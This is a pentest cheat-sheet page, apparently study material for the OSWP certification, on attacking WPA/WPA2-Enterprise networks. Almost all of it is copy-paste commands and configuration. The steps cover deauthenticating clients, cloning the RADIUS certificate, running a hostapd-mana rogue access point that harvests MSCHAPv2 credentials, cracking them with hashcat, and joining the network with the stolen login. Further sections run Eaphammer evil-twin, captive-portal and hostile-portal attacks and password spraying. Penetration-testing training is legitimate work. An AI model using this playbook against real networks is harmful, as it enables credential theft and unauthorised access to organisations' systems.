black electronics

WPA/WPA2-Enterprise

Attacking WPA/WPA2-Enterprise (802.1X / EAP)

Attacking WPA/WPA2-Enterprise

WPA/WPA2-Enterprise networks authenticate users against a RADIUS server over 802.1X/EAP. This section covers extracting the RADIUS certificate, standing up a rogue authentication endpoint using either the manual hostapd-mana / FreeRADIUS workflow or the automated Eaphammer workflow, capturing and cracking credentials, and password spraying.

Overview

WPA2-Enterprise (802.1X/EAP) networks can be attacked by impersonating the legitimate access point and RADIUS server so that clients attempt to authenticate against an attacker-controlled endpoint, revealing usernames and MSCHAPv2 challenge/response material that can be cracked offline. Two workflows are shown below: a manual hostapd-mana / FreeRADIUS setup, and an automated Eaphammer setup. Deauthenticating live clients (see WPA/WPA2-PSK) forces them to reconnect to the rogue AP.

RADIUS Certificate Extraction

Capturing the RADIUS server certificate lets you clone its identity for a more convincing rogue AP.

Terminal window
# Put the card in monitor mode and capture around the target
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon --band abg
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF --channel <channel> -w mgt --output-format pcap
# Force a reconnection to capture the EAP exchange
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Extract the certificate and identity from the capture in Wireshark:

  1. Open the PCAP in Wireshark and apply the tls filter to find the RADIUS certificate.
  2. Look for a packet with the info “Server Hello, Certificate, Server Key Exchange, Server Hello Done”.
  3. In the frame detail pane, expand “Transport Layer Security” -> “TLSv1.2 Record Layer: Handshake Protocol: Certificate” -> “Handshake Protocol: Handshake” -> “Certificates” -> “1st Certificate”, right-click and choose “Export Bytes”, and save it as cert.der.
  4. Get the identity via Edit -> Find Packet, searching for the string “Response, Identity”. Expand the “Extensible Authentication Protocol” field and read the “Identity” field.
Terminal window
# Print the RADIUS TLS certificate as text
openssl x509 -inform der -in cert.der -text
# Extract certificate handshakes from a capture (alternative)
tshark -nr capture.pcap -2 -R "ssl.handshake.certificate" -V

Manual Rogue AP (hostapd-mana / FreeRADIUS)

This is the manual OSWP-style workflow. It uses FreeRADIUS certificates and a hostapd-mana access point.

Prepare FreeRADIUS Certificates

Terminal window
# Edit the certificate configs using the values from the certificate above
sudo nano /etc/freeradius/3.0/certs/server.cnf
sudo nano /etc/freeradius/3.0/certs/ca.cnf
# Remove the default Diffie-Hellman certificate and regenerate
sudo rm -rf /etc/freeradius/3.0/certs/dh
sudo su - && cd /etc/freeradius/3.0/certs && make destroycerts
sudo su - && cd /etc/freeradius/3.0/certs && make

hostapd-mana Configuration

Terminal window
# Point hostapd-mana at the SSID and certificate paths
sudo nano /etc/hostapd-mana/mana.conf
/etc/hostapd-mana/mana.conf
# SSID of the AP
ssid=Corp-EAP
# Network interface and driver. Ensure the interface lists 'AP' in
# 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211
# Channel and mode (confirm the channel is allowed with 'iw phy PHYX info')
channel=10
hw_mode=g
# Set hostapd up as an EAP server
ieee8021x=1
eap_server=1
# Key workaround for Win XP
eapol_key_index_workaround=0
# EAP user file
eap_user_file=/etc/hostapd-mana/mana.eap_user
# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
# Open authentication, WPA/WPA2, WPA Enterprise
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
# Enable Mana WPE and store captured credentials
mana_wpe=1
mana_credout=/tmp/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1
Terminal window
# Create the EAP user file
sudo nano /etc/hostapd-mana/mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
# Stop monitor mode and launch the rogue AP
sudo airmon-ng stop wlan0mon
sudo hostapd-mana /etc/hostapd-mana/mana.conf # you should see connections

Capture and Crack Credentials

Terminal window
# View captured credentials and copy the hashes to a file
cat /tmp/hostapd.credout
# copy the hashes to e.g. wifi_hashes.txt
# Crack MSCHAPv2 credentials with Hashcat (mode 5500)
hashcat -a 0 -m 5500 wifi_hashes.txt <wordlist>

Connect to the Network

Terminal window
# Create a configuration file for the recovered credentials
nano wireless_mgt.conf
network={
ssid="Corp-EAP"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="<username>"
password="<password>"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
# Connect using the config file
sudo wpa_supplicant -i wlan0 -c wireless_mgt.conf
sudo wpa_supplicant -D nl80211 -i wlan0 -c wireless_mgt.conf
# Obtain an IP address
sudo dhclient wlan0 -v

Automated Rogue AP (Eaphammer)

Eaphammer automates the rogue-AP and credential-capture process for EAP networks.

Certificate Setup

Terminal window
cd ~/tools/eaphammer
sudo ./eaphammer --cert-wizard

Stealing RADIUS Credentials

Terminal window
# Evil twin against an EAP network, capturing credentials with --creds
sudo ./eaphammer --bssid AA:BB:CC:DD:EE:FF \
--essid Corp-EAP \
--channel 1 \
--wpa-version 2 \
--interface wlan0 \
--auth wpa-eap \
--creds
sudo ./eaphammer --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --wpa-version 2 --channel 1 --interface wlan0 --capture-wpa-handshakes yes --auth wpa-eap --creds

Captive Portal Attack

Terminal window
# Captive portal to also collect AD credentials
sudo ./eaphammer --bssid AA:BB:CC:DD:EE:FF --interface wlan0 --essid Corp-EAP --wpa-version 2 --channel 1 --auth wpa-eap --captive-portal

Hostile Portal Attack

Terminal window
sudo ./eaphammer --interface wlan0 --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --channel 1 --auth wpa-eap --wpa-version 2 --hostile-portal
sudo ./eaphammer -i wlan0 \
--essid Corp-EAP \
--channel 6 \
--wpa-version 2 \
--auth wpa-eap \
--hostile-portal \
--autocrack

Evil Twin with MANA and Cloaking

Terminal window
# Leave out --auth to keep clients connecting (best for open networks)
echo Corp-EAP > target-ess.txt # target names
echo AA:BB:CC:DD:EE:FF > mac-whitelist.txt # MAC addresses of targets
sudo ./eaphammer --interface wlan0 \
--essid Corp-EAP \
--channel 1 \
--bssid AA:BB:CC:DD:EE:FF \
--pmf enable \
--cloaking full \
--mana \
--wpa-version 2 \
--auth wpa-eap \
--creds \
--mac-whitelist mac-whitelist.txt \
--ssid-whitelist target-ess.txt

Known Beacon Attack

Terminal window
sudo ./eaphammer -i wlan0 --mana --loud --known-beacons --known-ssids-file wordlist.txt
sudo ./eaphammer -i wlan0 --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --mana --loud --known-beacons --auth wpa-eap --known-ssids-file wordlist.txt --captive-portal --creds

Deauthenticate Live Clients

Terminal window
for i in `cat mac-whitelist.txt`; do aireplay-ng -0 5 -a de:ad:be:ef:13:37 -c $i; done

Password Spraying

If usernames are known (or guessed), spray a single password against the EAP network. These tools support PEAP/MSCHAPv2.

Terminal window
python2 ~/tools/air-hammer/air-hammer.py -i wlan0 -e Corp-EAP -P password -u ~/tools/SecLists/Usernames/Customised/CommonUsernames.txt
sudo python2 ~/tools/Auto_EAP/Auto_EAP.py -i wlan0 -s Corp-EAP -U ~/tools/air-hammer/users.txt -p password -K WPA2-EAP -E PEAP
sudo python2 ~/tools/Auto_EAP/Auto_EAP.py -i wlan0 -s Corp-EAP -U ~/tools/air-hammer/users.txt -p password -K WPA-EAP -E TTLS

Additional and Legacy Enterprise Tooling

The Python 2-era tools below (crEAP, EAPeak) predate the primary Eaphammer / hostapd-mana workflows above and are retained as older/alternative options.

Terminal window
# crEAP - capture EAP identities and credentials
sudo python2 ~/tools/creap/crEAP.py
# EAPeak - audit EAP exchanges
cd ~/tools/eapeak
sudo pipenv shell
python2 eapeak -i wlan0 -s Corp-EAP -l

Advanced EAP Notes

Terminal window
# Stealing AD credentials via a hostile portal (EAP networks require creds to associate)
sudo ./eaphammer --interface wlan0 \
--bssid AA:BB:CC:DD:EE:FF \
--essid Corp-EAP \
--channel 6 \
--auth wpa-eap \
--hostile-portal
# Captive portal attack (needs RADIUS creds to attack mutual-auth inner protocols such as MSCHAPv2)
./eaphammer --bssid AA:BB:CC:DD:EE:FF \
--essid Corp-EAP \
--channel 149 \
--interface wlan0 \
--captive-portal
Useful LinksPentest PayloadsCheat Sheets